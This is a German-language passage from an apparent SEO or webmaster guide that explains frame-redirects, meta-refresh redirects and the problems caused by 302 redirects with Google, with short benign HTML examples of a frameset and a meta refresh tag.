Welche Art der Header-Weiterleitung nun wirklich genutzt wird, kann mit einem HTTP Status Code Checker analysiert werden. Zeigt dieser einen Status Code 302, so kann man gezielt eingreifen.

Frame-Redirect

Beim Frame-Redirect wird Ihre Seite in einen Frame gepackt. Domain A enthält exakt die gleiche Seite wie Domain B. Jedoch wird die Seite nur wie durch ein Fenster in einem anderen Haus angezeigt. Diese Variante ist nicht sehr
suchmaschinenfreundlich und Ihre Besucher werden es nicht mögen, denn die Besucher surfen innerhalb des Frames. Folge: Die Adresszeile ändert sich nicht und Ihre Besucher können die Unterseiten nicht bookmarken. In manchen
Fällen ist es allerdings doch sinnvoll einen Frame-Redirect einzusetzen. In der Praxis legt man eine index.html auf der entsprechenden Domain an und füllt diese mit dem anzuzeigenden Frame.

<html>
<head>
<title>Beispiel Frame-Redirect</title>
</head>
<frameset cols="100%,*" rows="*" frameborder=0 border=0>
<frame src="https://www.platinpower.com/">
</frameset>
</html>

Meta-Refresh

Häufig benutzt, aber nie gewollt – der Meta-Refresh. Ungeahnte Webmaster setzen Meta-Refreshs ein, um beispielsweise nach x Sekunden den Besucher auf die nächste Seite zu gelangen. Was sie jedoch nicht wissen, ist, dass diese Methode von Google genauso abgewertet wird, wie von den Benutzern, die mit aller Hektik von Seite zu Seite gerissen werden. Nur in wenigen Fällen ist ein Meta-Refresh sinnvoll. Beispielsweise möchte man in einem geschlossenem CMS den Besuchern nach dem Speichern der Änderungen das klicken auf “weiter” ersparen und leitet diese nach 3 Sekunden weiter.

  • Da ein Login erforderlich ist, bekommt Google & Co. nichts davon mit und
    man brauch sich nicht um gehijackte Seiten zu sorgen.
  • Die Besucher haben genug Zeit, um die kleine Information zu lesen, dass alles O.K. ist.

In dem Fall ist der Meta-Refresh in Ordnung. Dafür baut man ihn einfach zwischen die head-Tags:

<meta http-equiv="refresh" content="2;url=http://www.domain-B.de/">

Der “böse” 302er Redirect

Der 302er Redirect ist wohl einer der häufigst erwähntesten Redirects, von denen man hört. Dieser sagt nicht aus, dass
die Seite dauerhaft, sondern nur temporär nicht erreichbar ist. Bei Google bewirkte dies aus simpler Logik heraus beim linken von beliebten Seiten aus das entfernen der verlinkten Seite aus den Suchmaschinen und brachte viel Unruhe bei den “guten” SEOs und viele Klagen. Momentan arbeitet Google mit etwas Erfolg an der Problematik.